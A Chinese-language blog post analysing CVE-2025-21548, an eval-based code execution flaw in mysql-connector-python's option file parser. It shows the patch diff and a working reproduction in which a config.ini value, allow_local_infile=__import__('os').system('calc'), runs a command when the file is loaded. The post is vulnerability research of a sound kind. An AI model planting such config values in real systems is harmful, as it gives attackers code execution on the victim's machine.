#  CVE-2025-21548(mysql客户端RCE)   
原创 珂字辈  珂技知识分享   2025-03-31 18:00  
  
一、	前言  
  
  
中文搜这个漏洞，得出来得结果居然是Oracle MySQL Server 漏洞，但去官网上看通告，发现是mysql的python客户端漏洞  
  
https://www.oracle.com/security-alerts/cpujan2025.html  
  
![](https://mmbiz.qpic.cn/mmbiz_png/fUHjCzeNkU75LqcVb6n0KZCXGepRzQcjgblcicP53Nh4wvGcl9z12ia9qhaLt9Kv20VRSTkyaDmG7Za7BAWx0s6w/640?wx_fmt=png&from=appmsg "")  
  
不像java大家只用官方的mysql-connector-java一样，python中更常用的可能还是PyMySQL。  
  
https://github.com/PyMySQL/  
  
这次出漏洞的客户端是官方的mysql-connector-python，<=9.1.0。   
  
https://github.com/mysql/mysql-connector-python  
  
虽然CVE上的描述比较多也比较宽泛，但官网上没有任何只言片语。  
  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-21548  
  
  
此漏洞易于被利用，高权限攻击者可以通过多种协议通过网络访问 MySQL Connectors。成功的攻击需要除攻击者以外的其他人的交互。此漏洞的成功攻击可能导致未经授权地创建、删除或修改对关键数据或所有 MySQL Connectors 可访问数据的访问权限，以及未经授权读取部分 MySQL Connectors 可访问数据的权限，并可能导致 MySQL Connectors 挂起或频繁崩溃  
  
  
二、	diff  
  
  
这种情况只能去diff了，很容易发现。  
  
![](https://mmbiz.qpic.cn/mmbiz_png/fUHjCzeNkU75LqcVb6n0KZCXGepRzQcjiavg0Siad22H9YAiaGXjFPNwALtJENeXtTMCWQI6wW5bNOe3qFfbOlOYg/640?wx_fmt=png&from=appmsg "")  
  
![](https://mmbiz.qpic.cn/mmbiz_png/fUHjCzeNkU75LqcVb6n0KZCXGepRzQcj5kcxuNjM4mN0VZ7LpEfAapgFhiaYVW8zXt4g0woefYBYfGUa4LJnxPQ/640?wx_fmt=png&from=appmsg "")  
  
据此找到commit  
  
https://github.com/mysql/mysql-connector-python/commit/dd9ded0dec35dbba773487c548c336cf742830ab  
  
确定sink点在optionfiles.py，解析配置文件时直接使用了eval，修复方案为literal_eval。  
  
![](https://mmbiz.qpic.cn/mmbiz_png/fUHjCzeNkU75LqcVb6n0KZCXGepRzQcjF2friahqf3NJeic6T3fD0WYDk97IYfRtm8QgCxahicg7RNz9oqj7Pk7uQ/640?wx_fmt=png&from=appmsg "")  
  
  
三、	复现  
  
  
手动测试一下。  
```
python3 -m pip install --upgrade mysql-connector-python==8.0.33
```  
```
import mysql.connector

opt_file = 'config.ini'
connection = mysql.connector.connect(
    read_default_file=opt_file,
    option_groups=["incorrect_config"]
)
```  
```
[incorrect_config]

user=root
password=mypass
database=cpydata
port=int(3306)
allow_local_infile=__import__('os').system('calc')
```  
  
![](https://mmbiz.qpic.cn/mmbiz_png/fUHjCzeNkU75LqcVb6n0KZCXGepRzQcjZ2LOJphh2HFg2dDM6kzQJnc0lRIxFLmcTn2iaFdhl7ibhKn9zEf4CvJA/640?wx_fmt=png&from=appmsg "")  
  
  
非常简单易懂的漏洞。  
不过看起来跟漏洞描述对不上啊，这是怎么回事？搜mysql-connector-python的历史CVE，大部分都是这种类似的非常宽泛的描述。猜测是一种保护限制的烟雾弹？  
  
![](https://mmbiz.qpic.cn/mmbiz_png/fUHjCzeNkU75LqcVb6n0KZCXGepRzQcj2ZA15Jvz62W8cylWrhd7jiaBoGk6kgtKzmBEJ9ib5I8adho3yp7jxQcg/640?wx_fmt=png&from=appmsg "")  
  
![](https://mmbiz.qpic.cn/mmbiz_png/fUHjCzeNkU75LqcVb6n0KZCXGepRzQcjWGRyLuklRqqYGic52dDnFxV1R7ZxAn7Wqqiah6icqQicENAkU5z5ribgIUg/640?wx_fmt=png&from=appmsg "")  
  
  
  
